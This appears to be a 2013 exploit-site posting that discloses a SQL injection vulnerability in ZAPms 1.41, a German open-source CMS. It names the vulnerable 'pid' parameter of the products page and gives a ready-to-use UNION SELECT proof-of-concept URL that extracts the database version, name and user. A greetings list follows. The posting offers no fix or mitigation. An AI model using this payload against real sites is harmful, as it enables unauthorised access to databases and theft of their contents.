|    |    |    | Today: 17-Nov-2018 |

ZAPms SQL Injection Vulnerability

April 10, 2013 | Posted in ExploitAlert

[o] ZAPms <= SQL Injection Vulnerability

Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : ZAPms is free open source web content management system,
adapted to the needs of businesses on the Internet.
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.


=============================================================================================================


[o] Exploit

http://localhost/[path]/products?pid=[SQLi]


=============================================================================================================


[o] PoC

http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product


=============================================================================================================


[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================

[o] April 09 2013 - Papua, Indonesia

Taged in: injection, vulnerability, zapms